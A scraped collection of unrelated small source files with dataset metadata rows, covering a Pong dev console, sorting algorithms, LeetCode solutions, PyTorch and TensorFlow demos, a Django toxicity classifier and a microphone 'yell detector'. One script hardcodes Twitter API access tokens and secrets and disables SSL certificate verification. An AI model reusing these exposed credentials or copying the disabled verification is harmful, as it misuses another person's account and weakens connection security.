##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# GLOBAL
#
""" DEPRECATED
argv = sys.argv
argcount = len(argv)
if argcount > 1:
argcommand = argv[1]
# commandlist = ["dev_gamelog","game_ball_add","game_ball_remove","game_reset","game_ball_raytrace","game_pad_size"]
"""
commandlist = []
commandlist.append(["dev_gamelog","{Bool}","Enable/Disable game event log print"])
commandlist.append(["game_ball_add","No param","Add a new ball"])
commandlist.append(["game_ball_remove","No param","Remove the last ball"])
commandlist.append(["game_reset","No param","Reset the game"])
commandlist.append(["game_ball_raytrace","{Bool}","Enable/Disable Ball raytrace"])
commandlist.append(["game_pad_size","{Pad id} {Size}","Change pad size"])
log = []
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# FUNCTIONS
#
### PRINT
def print_undefined(arg):
message = "Error : command \"" + arg + "\" does not exist."
log.append(message)
print(message)
def print_wip(arg):
message = "Sorry : command \"" + arg + "\" is not implemented yet."
log.append(message)
print(message)
def print_help():
message = "Available commands :"
log.append(message)
print(message)
for i in commandlist :
message = i[0].ljust(25) + i[1].ljust(25) + i[2]
log.append(message)
print(message)
def print_game_ball_add():
message = "Adding one ball to the game."
log.append(message)
print(message)
### INPUT TREATMENT
def console_input(arg):
if arg == "" or arg[0] == " " : return SKIP # Do nothing if input is blank
arg = arg.lower() # Don't care of the case
if arg == "help":
print_help()
return SKIP
elif arg == "dev_gamelog":
print_wip(arg)
return DEV_GAMELOG
elif arg == "game_ball_add":
print_game_ball_add()
return GAME_BALL_ADD
elif arg == "game_ball_remove":
print_wip(arg)
return GAME_BALL_REMOVE
elif arg == "game_reset":
print_wip(arg)
return GAME_RESET
elif arg == "game_ball_raytrace":
print_wip(arg)
return GAME_BALL_RAYTRACE
elif arg == "game_pad_size":
print_wip(arg)
return GAME_BALL_SIZE
else:
print_undefined(arg)
return SKIP
### LOG MANAGEMENT
def get_log():
return log
##~~~~~~~~~~~~~~~~-~~~~~~~~~~~~~~~~~##
# MAIN
#
""" PRINT INPUT - DEPRECATED
print(argv)
print(argcount)
print("Command : " + argcommand)
"""
""" DEPRECATED
if argcount > 1:
console_input(argcommand)
while(1):
usercommand = input("- ")
log.append(usercommand)
usercommand = list(usercommand.split(" ")) # Take the string list as a whole and split it into string sub-lists (= 2D array) for each words
console_input(usercommand[0]) # Take the first word as parameter (= command)
"""
| Pitchumi/PongPython | TKinter/devconsole.py | devconsole.py | py | 4,294 | python | en | code | 0 | github-code | 13 |
70337602579 | #!/usr/bin/env python
"""
Minimal example for running an async web server using aiohttp.
Code taken from here:
http://aiohttp.readthedocs.io/en/stable/web.html
"""
from aiohttp import web
async def hello(request):
return web.Response(body=b"Hello, world")
app = web.Application()
app.router.add_route('GET', '/', hello)
web.run_app(app)
| deeplook/backend-code-challenge | serve_aiohttp.py | serve_aiohttp.py | py | 347 | python | en | code | 0 | github-code | 13 |
22335271885 | #Solution1 - for fractional numbers only
class Sort:
def insertionSort(Self, arr):
for i in range(1, len(arr)):
key = arr[i]
j = i-1
while j>=0 and key<arr[j]:
arr[j+1] = arr[j]
j -= 1
arr[j+1] = key
return arr
def bucketSort(self, arr):
buckets = []
for num in range(len(arr)):
buckets.append([])
for i in arr:
bucket_index = int(len(arr)*i)
buckets[bucket_index].append(i)
for j in range(len(arr)):
buckets[j] = self.insertionSort(buckets[j])
k=0
for i in range(len(arr)):
for j in range(len(buckets[i])):
arr[k] = buckets[i][j]
k+=1
return arr
obj = Sort()
arr1 = [0.897, 0.565, 0.656, 0.1234, 0.665, 0.3434]
sortedArray = obj.bucketSort(arr1)
print(sortedArray)
#Solution2 - for fractional or integers
class Sort:
def insertionSort(self, arr):
for i in range(1, len(arr)):
key = arr[i]
j = i-1
while j>=0 and key<arr[j]:
arr[j+1] = arr[j]
j -= 1
arr[j+1] = key
return arr
def bucketSort(self,arr):
largest = max(arr)
size = largest/len(arr)
buckets = []
for _ in range(len(arr)):
buckets.append([])
for i in range(len(arr)):
j = int(arr[i]/size)
if j != len(arr):
buckets[j].append(arr[i])
else:
buckets[len(arr)-1].append(arr[i])
for i in range(len(arr)):
self.insertionSort(buckets[i])
k = 0
for i in range(len(arr)):
for j in range(len(buckets[i])):
arr[k] = buckets[i][j]
k +=1
return arr
obj = Sort()
arr2 = [12,11,13,5,6]
sortedArray = obj.insertionSort(arr2)
print(sortedArray)
| komalupatil/Leetcode_Solutions | Sorting Algorithms/Bucket Sort.py | Bucket Sort.py | py | 1,987 | python | en | code | 1 | github-code | 13 |
21472626439 | import numpy as np
import tensorflow as tf
from pathlib import Path
from django.views.generic import TemplateView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render
from .forms import CommentTextForm
from .utils import clear_text
from .models import Results, UserStudiesCount
# Create your views here.
class ClassificationView(LoginRequiredMixin, TemplateView):
template_name = "classifier/classification.html"
def get(self, request):
try:
user_studies_count = UserStudiesCount.objects.get(user=request.user)
except:
studies_count = 0
else:
studies_count = user_studies_count.count
context = {
"form": CommentTextForm(),
"studies_count": studies_count,
}
return render(request, self.template_name, context)
def post(self, request):
form = CommentTextForm(request.POST)
if form.is_valid():
input_text = form.cleaned_data.get("comment_text")
clean_text = clear_text(input_text)
model = tf.keras.models.load_model(
Path(Path(__file__).parent, "end_to_end_48")
)
predict = model.predict(np.expand_dims(clean_text, 0))
predict = (predict > 0.5).astype(int)
results = Results(
comment_text=input_text,
toxic=predict[0][0],
severe_toxic=predict[0][1],
obscene=predict[0][2],
threat=predict[0][3],
insult=predict[0][4],
identity_hate=predict[0][5],
)
results.save()
user_studies_count = UserStudiesCount.objects.get(user=request.user)
user_studies_count.count += 1
user_studies_count.save()
context = {
"form": form,
"results": {
"toxic": predict[0][0],
"severe_toxic": predict[0][1],
"obscene": predict[0][2],
"threat": predict[0][3],
"insult": predict[0][4],
"identity_hate": predict[0][5],
},
}
return render(request, self.template_name, context)
| pavlovich-ivan/text-toxicity-analyzer | app/classifier/views.py | views.py | py | 2,315 | python | en | code | 0 | github-code | 13 |
2105030042 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author: ran
@file: triangle_120.py
@time: 2021/6/20 16:25
@desc:
三角形最小路径和
给定一个三角形 triangle ,找出自顶向下的最小路径和。
每一步只能移动到下一行中相邻的结点上。相邻的结点 在这里指的是 下标 与 上一层
结点下标 相同或者等于 上一层结点下标 + 1 的两个结点。也就是说,如果正位于当前行
的下标 i ,那么下一步可以移动到下一行的下标 i 或 i + 1 。
动态规划解题 思路:
1.定义状态
DP[i, j] 为从最下面节点到[i, j]节点走的路径和的最小值
2.DP方程:列出状态转移方程
DP[i, j] = min(DP[i+1, j], DP[i+1, j+1]) + triangle[i, j]
核心思想:反向进行递推
"""
class Solution(object):
def minimumTotal(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
if not triangle:
return 0
res = triangle[-1]
for i in range(len(triangle) - 2, -1, -1):
for j in range(len(triangle[i])):
res[j] = triangle[i][j] + min(res[j], res[j + 1])
return res[0]
| reflectc/leetcode_program | src/triangle_120.py | triangle_120.py | py | 1,296 | python | zh | code | 0 | github-code | 13 |
1310102853 | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
class MultivariateLinearRegressionModel(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(3, 1)
def forward(self, x):
return self.linear(x)
def train(model, optimizer, x_train, y_train):
nb_epochs = 20
for epoch in range(nb_epochs):
prediction = model(x_train)
cost = F.mse_loss(prediction, y_train)
optimizer.zero_grad()
cost.backward()
optimizer.step()
print('Epoch {:4d}/{} Cost: {:.6f}'.format(epoch, nb_epochs, cost.item()))
torch.manual_seed(1)
x_train = torch.FloatTensor([[73, 80, 75],
[93, 88, 93],
[89, 91, 90],
[96, 98, 100],
[73, 66, 70]])
y_train = torch.FloatTensor([[152], [185], [180], [196], [142]])
norm_x_train = (x_train - x_train.mean(dim=0))/x_train.std(dim=0)
print(norm_x_train)
print(x_train)
model = MultivariateLinearRegressionModel()
#optimizer = optim.SGD(model.parameters(), lr=0.0000001)
#train(model, optimizer, x_train, y_train)
#print('------')
model = MultivariateLinearRegressionModel()
optimizer = optim.SGD(model.parameters(), lr=0.1) # 노멀라이즈 한게 더 빠르게 수렴하는편.
train(model, optimizer, norm_x_train, y_train) | tnqkr98/SpeechRecognition | py_remind11(DataProcessing).py | py_remind11(DataProcessing).py | py | 1,415 | python | en | code | 0 | github-code | 13 |
38362611888 | class Solution1(object):
"""
Sorting
- Time: O(N log N)
- Space: O(N)
"""
def kClosest(self, points, K):
"""
:type points: List[List[int]]
:type K: int
:rtype: List[List[int]]
"""
dist = [(i,x[0]*x[0]+x[1]*x[1]) for i,x in enumerate(points)]
dist.sort(key=lambda x:x[1])
return [points[i] for i,_ in dist[:K]]
class Solution2(object):
"""
QuickSort
- Time: O(N)
- Space: O(N)
"""
def kClosest(self, points, K):
"""
:type points: List[List[int]]
:type K: int
:rtype: List[List[int]]
"""
self.topK = []
self.findTopK(points, K)
return self.topK
def findTopK(self, points, K):
# choose pivot: just select the 1st element // TO-DO: improve by order of statics
pivot_idx, i = 0, 1
pivot_dist = points[pivot_idx][0]*points[pivot_idx][0]+points[pivot_idx][1]*points[pivot_idx][1]
while i<len(points):
if points[i][0]*points[i][0]+points[i][1]*points[i][1] < pivot_dist:
# swap(i,pivot) to move points[i] to smaller part
tmp = points[i]
points[i] = points[pivot_idx]
points[pivot_idx] = tmp
# swap(i,pivot+1) to remain order [<pivot|pivot|>pivot]
tmp = points[pivot_idx+1]
points[pivot_idx+1] = points[i]
points[i] = tmp
pivot_idx += 1
i += 1
if pivot_idx<K:
self.topK += points[:pivot_idx+1]
if K-pivot_idx-1>0: self.findTopK(points[pivot_idx+1:], K-pivot_idx-1)
else: self.findTopK(points[:pivot_idx+1], K)
| rctzeng/AlgorithmDataStructuresPractice | Leetcode/KClosestPointsToOrigin_973.py | KClosestPointsToOrigin_973.py | py | 1,727 | python | en | code | 0 | github-code | 13 |
22335021715 | #Leetcode 17. Letter Combinations of a Phone Number
class Solution:
def letterCombinations(self, digits: str) -> List[str]:
mapping = { "2": "abc", "3": "def", "4":"ghi", "5":"jkl", "6":"mno", "7":"pqrs", "8":"tuv", "9":"wxyz"}
if len(digits) == 0:
return []
if len(digits) == 1:
return list(mapping[digits[0]])
result = []
path = ""
self.dfs(digits, 0, path, mapping, result)
return result
def dfs(self, digits, index, path, mapping, result):
if index == len(digits):
result.append(path)
return
string = mapping[digits[index]]
for c in string:
self.dfs(digits, index+1, path + c, mapping, result) | komalupatil/Leetcode_Solutions | Medium/Letter Combinations of a Phone Number.py | Letter Combinations of a Phone Number.py | py | 769 | python | en | code | 1 | github-code | 13 |
16732682352 | import sounddevice as sd
import numpy as np
import os
import sys
import math
import time
import datetime
import argparse
import csv
from timeit import default_timer as timer
parser = argparse.ArgumentParser(description="Beeps at you when you\'re too loud",
formatter_class=argparse.RawTextHelpFormatter)
# needs to be renamed and able to set to a choice of low/med/high or something similar
# e.g. -s (sensitivity), -l (level)
parser.add_argument("-t", "--threshold", help="normalized volume value that triggers a 'yell'",
type=int, default=180)
parser.add_argument("-d", "--duration", type=int, default=1,
help="time (in seconds) in between 'yells' (default 1 second)")
parser.add_argument("-v", "--verbosity", type=int, default=0, choices=[0,1,2],
help="""how verbose the program is:
0 = no printed output
1 = outputs audio bars
2 = outputs normalized volume values""")
parser.add_argument("-nr", "--NoRecord", help="disables recording data into a .csv file", action="store_true")
args = parser.parse_args()
# normalized volume value that triggers a 'yell' (Default 180)
threshold = args.threshold
# Duration in seconds between 'yells' (Default 1 second)
duration = args.duration
# Determines the verbosity of the printed output
# 0 = no output, 1 = bars, 2 = exact values
verbosity = args.verbosity
# In Powershell, this creates the windows noise
cmd = "echo " + chr(7)
# Open the data.csv file in append mode
f = open('./yell_records.csv', 'a', newline='')
field_names = ['Threshold', 'Volume Value', 'Datetime']
writer = csv.writer(f)
# Write headers if file is empty
if os.stat('yell_records.csv').st_size == 0:
writer.writerow(field_names)
yell_counter = 0
start_time = timer()
start_datetime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# Save for later!!! -- grabs and formats current datetime. Used for storing time of yell in .csv
# current_datetime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def print_sound(indata, outdata, frames, time, status):
global yell_counter
volume_norm = np.linalg.norm(indata)*10
if (verbosity == 1):
print ("|" * int(volume_norm))
elif (verbosity == 2):
print(int(volume_norm))
if (volume_norm >= threshold): # 180 seems like a good start
os.system(cmd)
current_datetime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
data = [threshold, math.trunc(volume_norm), current_datetime]
writer.writerow(data)
yell_counter += 1
sd.sleep(duration * 1000)
try:
with sd.Stream(blocksize=0, callback=print_sound):
# sd.sleep(duration * 1000)
print('press Ctrl+C to stop the recording')
while True:
time.sleep(60)
except KeyboardInterrupt:
f.close()
seconds = math.trunc(timer() - start_time)
# formats elapsed time in seconds to datetime format, accounting for rollover (>24h)
elapsed_time = str(datetime.timedelta(seconds=seconds))
field_names = ['Datetime started', 'Elapsed Time', 'Number of Yells', 'Threshold']
data = [start_datetime, elapsed_time, yell_counter, threshold]
with open('session_records.csv', 'a', newline='') as f:
writer = csv.writer(f)
# Write headers if file is empty
if os.stat('session_records.csv').st_size == 0:
writer.writerow(field_names)
writer.writerow(data)
if (args.NoRecord):
sys.exit('Interrupted by user. Program ran for {}'.format(elapsed_time))
sys.exit('Interrupted by user; you yelled {} times within a time interval of {}!'.format(yell_counter, elapsed_time)) | OliveiraRyan/YellDetector | audio_reader.py | audio_reader.py | py | 3,715 | python | en | code | 0 | github-code | 13 |
71545554259 | import tensorflow as tf
import numpy as np
import matplotlib
from matplotlib import pyplot as plt
num_classes = 10
img_rows, img_cols, img_ch = 28, 28, 1
input_shape = (img_rows, img_cols, img_ch)
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train = x_train.reshape(x_train.shape[0], *input_shape)
x_test = x_test.reshape(x_test.shape[0], *input_shape)
print('Training data: {}'.format(x_train.shape))
print('Testing data: {}'.format(x_test.shape))
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPooling2D
def lenet(name='lenet'):
model = Sequential(name=name)
# 1st block:
model.add(Conv2D(6, kernel_size=(5, 5), padding='same', activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2, 2)))
# 2nd block:
model.add(Conv2D(16, kernel_size=(5, 5), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# Dense layers:
model.add(Flatten())
model.add(Dense(120, activation='relu'))
model.add(Dense(84, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
return model
from tensorflow.keras.optimizers import SGD, Adagrad, Adadelta, RMSprop, Adam, Adamax, Nadam
# Setting some variables to format the logs:
log_begin_red, log_begin_blue, log_begin_green = '\033[91m', '\n\033[94m', '\033[92m'
log_begin_bold, log_begin_underline = '\033[1m', '\033[4m'
log_end_format = '\033[0m'
optimizers_examples = {
'sgd': SGD(),
'momentum': SGD(momentum=0.9),
'nag': SGD(momentum=0.9, nesterov=True),
'adagrad': Adagrad(),
'adadelta': Adadelta(),
'rmsprop': RMSprop(),
'adam': Adam(),
'adamax': Adamax(),
'nadam': Nadam()
}
history_per_optimizer = dict()
print("Experiment: {0}start{1} (training logs = off)".format(log_begin_red, log_end_format))
for optimizer_name in optimizers_examples:
# Resetting the seeds (for random number generation), to reduce the impact of randomness on the comparison:
tf.random.set_seed(42)
np.random.seed(42)
# Creating the model:
model = lenet("lenet_{}".format(optimizer_name))
optimizer = optimizers_examples[optimizer_name]
model.compile(optimizer=optimizer, loss='sparse_categorical_crossentropy', metrics=['accuracy'])
# Launching the training (we set `verbose=0`, so the training won't generate any logs):
print("\t> Training with {0}: {1}start{2}".format(
optimizer_name, log_begin_red, log_end_format))
history = model.fit(x_train, y_train,
batch_size=32, epochs=10, validation_data=(x_test, y_test),
verbose=1)
history_per_optimizer[optimizer_name] = history
print('\t> Training with {0}: {1}done{2}.'.format(
optimizer_name, log_begin_green, log_end_format))
print("Experiment: {0}done{1}".format(log_begin_green, log_end_format))
fig, ax = plt.subplots(2, 2, figsize=(10,10), sharex='col')
ax[0, 0].set_title("loss")
ax[0, 1].set_title("val-loss")
ax[1, 0].set_title("accuracy")
ax[1, 1].set_title("val-accuracy")
lines, labels = [], []
for optimizer_name in history_per_optimizer:
history = history_per_optimizer[optimizer_name]
ax[0, 0].plot(history.history['loss'])
ax[0, 1].plot(history.history['val_loss'])
ax[1, 0].plot(history.history['accuracy'])
line = ax[1, 1].plot(history.history['val_accuracy'])
lines.append(line[0])
labels.append(optimizer_name)
fig.legend(lines,labels, loc='center right', borderaxespad=0.1)
plt.subplots_adjust(right=0.85)
plt.show() | bashendixie/ml_toolset | 案例67 tensorflow2.8 比较不同优化器/test_optimizers.py | test_optimizers.py | py | 3,641 | python | en | code | 9 | github-code | 13 |
8151426436 | import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import toascii
max_len = 250
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Net(nn.Module):
def __init__(self, device, batch_size, input_size=max_len, hidden_size=max_len, num_layers=3):
super(Net, self).__init__()
self.device = device
self.hidden_size = hidden_size
self.batch_size = batch_size
self.num_layers = num_layers
self.vocab_size = 55193 + 1
self.embedding = nn.Embedding(
num_embeddings=self.vocab_size,
embedding_dim=input_size,
padding_idx=0
)
self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True, bidirectional=True)
self.lstm2 = nn.LSTM(hidden_size*2, hidden_size, num_layers, batch_first=True, bidirectional=True)
self.dropout = nn.Dropout(0.5)
self.fc = nn.Linear(input_size * 2, max_len)
def forward(self, x, seq_len):
embed = self.embedding(x)
packed_embed = pack_padded_sequence(embed, seq_len, batch_first=True)
# Initialize hidden state, cell state with zeros
h0 = torch.zeros(self.num_layers * 2, x.size()[0], self.hidden_size).requires_grad_().to(self.device)
c0 = torch.zeros(self.num_layers * 2, x.size()[0], self.hidden_size).requires_grad_().to(self.device)
out, (final_hidden_state, final_cell_state) = self.lstm(packed_embed, (h0, c0))
out, (final_hidden_state, final_cell_state) = self.lstm2(out)
output_unpacked, output_lengths = pad_packed_sequence(out, batch_first=True)
h_t = output_unpacked[:, -1, :]
out = self.dropout(h_t)
out = self.fc(out)
return out
model = Net(DEVICE, 1).cuda()
model.load_state_dict(torch.load('checkpoint.pt'))
model.eval()
sigmoid = torch.sigmoid
def predict(model, x, len_seq):
"""학습된 모델로 정답 파일 예측"""
logit = model(x, [torch.tensor(len_seq).int()])
return logit
with torch.no_grad():
text = "술마시다 물마시다 커피 마시다처럼 쓰는 것이 의미상 좀 더 적확하다고 볼 수는 있겠으나 그렇다고 하여 먹다를 쓸 수 없는 것은 아닙니다 한국어의 먹다는 액체뿐만 아니라 기체에도 사용됨을 참고하시기 바랍니다"
pred = predict(model, toascii.asci(text, max_len), len(text))
pred = sigmoid(pred).round()
text = [i for i in text]
result = []
for index, label in enumerate(pred):
a = torch.eq(label, torch.ones(max_len).to(DEVICE)).detach().cpu()
for i, tex in enumerate(text):
if a[i]:
result.append(tex)
else:
result.append(tex + ' ')
print("".join(result))
| HaloKim/kor-sentence | predict.py | predict.py | py | 2,830 | python | en | code | 0 | github-code | 13 |
70221744018 | from django.shortcuts import render, redirect
from django.http import HttpResponse
from qtech_search_engine.models import KeywordDescriptionModel, AllUsers
# Create your views here.
def HomeView(request):
keywords = KeywordDescriptionModel.objects.all()
context = {
'keywords': keywords,
}
return render(request, "qtech_search_engine/home.html", context)
def SearchView(request):
try:
print("Trying")
print(request.COOKIES['device'])
customer, created = AllUsers.objects.get_or_create(user_sid = request.COOKIES['device'])
if created is True:
print("creating")
counter = AllUsers.objects.all().count()
customer.username = "User " + str(counter)
customer.save()
if "keyword_submit_button" in request.POST:
print("Searching: ", request.POST['keyword_query'])
try:
keyword_instance = KeywordDescriptionModel.objects.get(keyword=request.POST['keyword_query'])
keyword_searched_counter = keyword_instance.times_searched + 1
print(keyword_searched_counter)
keyword_instance.times_searched = keyword_searched_counter
keyword_instance.save()
print("Updated counter")
keyword_instance.user.add(customer)
keywords = KeywordDescriptionModel.objects.all()
searches = KeywordDescriptionModel.objects.filter(keyword=request.POST['keyword_query'])
context = {
'keywords': keywords,
'searches': searches
}
return render(request, "qtech_search_engine/results.html", context)
except:
print("")
except:
print("No cookie found")
context = {
}
return render(request, "qtech_search_engine/search.html", context)
def TestView(request):
keywords = KeywordDescriptionModel.objects.all()
context = {
'keywords': keywords,
}
return render(request, "qtech_search_engine/test.html", context) | thedrowsywinger/qtech_interview_problem | qtech_search_engine/views.py | views.py | py | 2,197 | python | en | code | 0 | github-code | 13 |
2369303713 | from twitter import Twitter, OAuth
import random
import os, ssl
#catches verification errors
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and
getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
def butt(hashtags):
ACCESS_TOKEN = "1094105071346954240-cq8p86mVwoNW5D4hVgCpgetlNXhhEq"
ACCESS_SECRET = "yF8wWyLqEX16RvmHqWxQnh1jBN619lRKlrn6LK42FxZM9"
CONSUMER_KEY = "PW3luCZ75v2Pi7d11w7z9yIbm"
CONSUMER_SECRET = "tueL9DcKQUZjAhntoXZDQXhcmqnR2KyrTchLttprZIolVIt8ZP"
oauth = OAuth(ACCESS_TOKEN, ACCESS_SECRET, CONSUMER_KEY, CONSUMER_SECRET)
t = Twitter(auth=oauth)
query = t.search.tweets(q='%23' + hashtags)
detects = []
for s in query['statuses']:
print(s['text'], '\n')
detects.append(s['text'])
randCapt = random.choice(detects)
randCapt = "#" + randCapt
return randCapt
butt('lmfao')
print(butt('lmfao')) | Andeyn/TartanHacks | POOPOO.py | POOPOO.py | py | 1,162 | python | en | code | 0 | github-code | 13 |
74403148817 | import sys
from sets import Set
def get_problem(infile):
NM = [int(val) for val in infile.next().strip().split(' ')]
N = NM[0]
M = NM[1]
exist_dir = None
new_dir = None
exist_dir = [infile.next().strip() for i in range(N)]
new_dir = [infile.next().strip() for j in range(M)]
return (exist_dir, new_dir)
def insert_dir_to_set(S, new_dir):
tokens = new_dir.split('/')
for res in expand_dir(tokens):
S.add(res)
def expand_dir(tokens):
tokens.pop(0)
for i in range(len(tokens)):
res = ''
for j in range(i+1):
res = res+'/'+tokens[j]
yield res
def solve_problem(case):
exist_dir = case[0]
new_dir = case[1]
dir_set = Set()
for d in exist_dir:
insert_dir_to_set(dir_set, d)
count = 0
for d in new_dir:
expanded = expand_dir(d.split('/'))
for d in expanded:
if d not in dir_set:
dir_set.add(d)
count = count+1
return count
def main():
infile = open(sys.argv[1], 'r')
outfile = open(sys.argv[2],'w')
T = int(infile.next())
problems = [get_problem(infile) for i in range(T)]
result = [solve_problem(case) for case in problems]
for i in range(len(result)):
outfile.write("Case #{0}: {1}\n".format(i+1, result[i]))
if __name__ == "__main__":
main()
| litao91/googlecodejam | filefixit/filefixit.py | filefixit.py | py | 1,375 | python | en | code | 1 | github-code | 13 |
36933256183 | '''
Welcome to GDB Online.
GDB online is an online compiler and debugger tool for C, C++, Python, Java, PHP, Ruby, Perl,
C#, VB, Swift, Pascal, Fortran, Haskell, Objective-C, Assembly, HTML, CSS, JS, SQLite, Prolog.
Code, Compile, Run and Debug online from anywhere in world.
'''
n=int(input("Enter the number of elements: "))
lst=[]
for i in range(n):
lst.append(input("Enter the element: "))
print(lst)
for i in range(n):
for j in range(n):
if(i<=j):
print(lst[j-i],end=" ")
else:
a=n-(i-j)
print(lst[a],end=" ")
print("\n") | imhariprakash/Courses | python/hackerrank programs/abc-cab-bca-pattern-py/main.py | main.py | py | 593 | python | en | code | 4 | github-code | 13 |
29201566825 | import numpy as np
import datetime
print('start loading data:', datetime.datetime.now())
file = "clustering1.txt"
print('start loading data:', datetime.datetime.now())
with open('F:\\Google Drive\\coursera\\Algorithms - Tim Roughgarden\\3. Greedy Algorithms, Minimum Spanning Trees, and Dynamic Programming\\' + file) as f:
lines=f.read().split('\n')
i = -1
for l in range(len(lines)):
if lines[l]:
tmp = lines[l].split()
tmp = [int(t) for t in tmp]
if i==-1:
n_v = tmp[0]
i += 1
G = np.zeros(shape = (n_v*(n_v-1)//2,3))
else:
G[i,:] = tmp
i+=1
print(G, G.shape)
print('finish loading data, start calculating:', datetime.datetime.now())
k=4
n_cluster = n_v # initially each vertice is a cluster
cluster = np.column_stack((range(1,n_v+1), range(1,n_v+1)))
# ndarray: first column is vertice number, second column is cluster number
G = G[np.argsort(G[:,2])] # sort edges by distances
for i in range(len(G)):
v1, c1 = tuple(cluster[cluster[:,0]==G[i,0],:][0])
v2, c2 = tuple(cluster[cluster[:,0]==G[i,1],:][0])
if c1 != c2: # if two vertices belong to different cluster
if n_cluster==k:
max_spacing = G[i,2]
break
cluster[cluster[:,1]==c1, 1] = c2
n_cluster -= 1
#print(G)
print('max_spacing=', max_spacing)
for gr in set(cluster[:,1]):
print('group ', gr, 'has ', cluster[cluster[:,1]==gr].shape[0], 'vertices')
| sunanqi/learning | Greedy Algorithms- Minimum Spanning Trees- and Dynamic Programming by Tim Roughgarden/clustering.py | clustering.py | py | 1,479 | python | en | code | 0 | github-code | 13 |
32903262375 | import tkinter as tk
from tkinter import ttk, filedialog, simpledialog
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import pandas as pd
import libSimpleNnet
class Application(tk.Frame):
"""
GUI class, inherits from Tkinter's Frame class.
"""
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.create_widgets()
self.figure = Figure(figsize=(5, 5), dpi=100)
self.loss_plot = self.figure.add_subplot(111)
self.loss_plot.set_xlabel("Epoch")
self.loss_plot.set_ylabel("Loss")
self.canvas = FigureCanvasTkAgg(self.figure, self)
self.canvas.get_tk_widget().pack()
def create_widgets(self):
"""
Initialize the GUI widgets.
"""
self.load_btn = tk.Button(self, text="LOAD TRAINING DATA", command=self.load_csv)
self.load_btn.pack(side="top")
self.epoch_label = tk.Label(self, text="Number of Epochs: ")
self.epoch_label.pack(side="top")
self.epoch_spinbox = tk.Spinbox(self, from_=1, to=1000)
self.epoch_spinbox.pack(side="top")
self.train_btn = tk.Button(self, text="TRAIN NETWORK", command=self.train_network)
self.train_btn.pack(side="top")
self.progress = ttk.Progressbar(self, length=200, mode='determinate')
self.progress.pack(side="top")
self.save_model_btn = tk.Button(self, text="SAVE MODEL", command=self.save_model)
self.save_model_btn.pack(side="top")
self.load_model_btn = tk.Button(self, text="LOAD MODEL", command=self.load_model)
self.load_model_btn.pack(side="top")
self.run_model_btn = tk.Button(self, text="RUN MODEL", command=self.run_model)
self.run_model_btn.pack(side="top")
def load_csv(self):
"""
Load the CSV file using a file dialog and preprocess the data.
"""
file_path = filedialog.askopenfilename()
df = pd.read_csv(file_path)
self.X_train, self.y_train = libSimpleNnet.preprocess_data(df, 'target')
def update_progress(self, value):
"""
Update the progress bar.
"""
self.progress["value"] = value
self.update_idletasks()
def update_loss_plot(self, losses, epoch):
"""
Update the loss plot.
"""
self.loss_plot.clear()
self.loss_plot.plot(range(epoch+1), self.losses[:epoch+1], 'r') # Use self.losses directly
self.canvas.draw()
def train_network(self):
"""
Train the LSTM model and update the progress bar and loss plot.
"""
if not hasattr(self, 'X_train') or not hasattr(self, 'y_train'):
tk.messagebox.showerror("Error", "No data loaded for training. Please load a data file first.")
return
epochs = int(self.epoch_spinbox.get())
self.losses = [] # Initialize losses before training
callback = libSimpleNnet.ProgressCallback(self)
self.model, self.history = libSimpleNnet.train_model(self.X_train, self.y_train, callback=callback, epochs=epochs)
self.losses = self.history.history['loss'] # Update losses after training
def update_epoch_progress(self, epoch):
"""
Update the text widget to display the progress of each epoch.
"""
self.progress_text.delete('1.0', tk.END)
self.progress_text.insert(tk.END, f"Completed {epoch} out of {self.epoch_spinbox.get()} epochs")
def save_model(self):
"""
Save the trained model to a file.
"""
if not hasattr(self, 'model'):
tk.messagebox.showerror("Error", "No model has been trained yet.")
return
file_path = filedialog.asksaveasfilename(defaultextension=".h5")
if file_path:
libSimpleNnet.save_model(self.model, file_path)
def load_model(self):
"""
Load a previously saved model from a file.
"""
file_path = filedialog.askopenfilename(filetypes=(("HDF5 files", "*.h5"),))
if not file_path:
return
try:
self.model = libSimpleNnet.load_model_from_file(file_path)
except Exception as e:
tk.messagebox.showerror("Error", f"Failed to load model. Error: {str(e)}")
def run_model(self):
"""
Run the model on input data from the user.
"""
if not hasattr(self, 'model'):
tk.messagebox.showerror("Error", "No model has been loaded or trained yet.")
return
input_string = simpledialog.askstring("Input", "Enter your input data:")
try:
input_data = libSimpleNnet.preprocess_data_array(input_string)
result = self.model.predict(input_data)
tk.messagebox.showinfo("Model Output", f"The model's output is: {result[0]}") # Assuming the output is a single value
except Exception as e:
tk.messagebox.showerror("Error", f"Failed to run model. Error: {str(e)}")
root = tk.Tk()
app = Application(master=root)
app.mainloop()
| asparks1987/libsimplennet | simpleNnetGUI.py | simpleNnetGUI.py | py | 5,154 | python | en | code | 0 | github-code | 13 |
4210417730 | import math
from typing import List
class Solution:
def minEatingSpeed(self, piles: List[int], h: int) -> int:
def calc_time(mid, piles):
sum = 0
for i in range(len(piles)):
sum += math.ceil(piles[i]/mid)
return sum
low = 1
high = max(piles)
ans = 0
while low <= high:
mid = (low + high) // 2
time = calc_time(mid, piles)
if time <= h:
ans = mid
high = mid - 1
else:
low = mid + 1
return ans
print(Solution().minEatingSpeed([3, 6, 7, 11], 8))
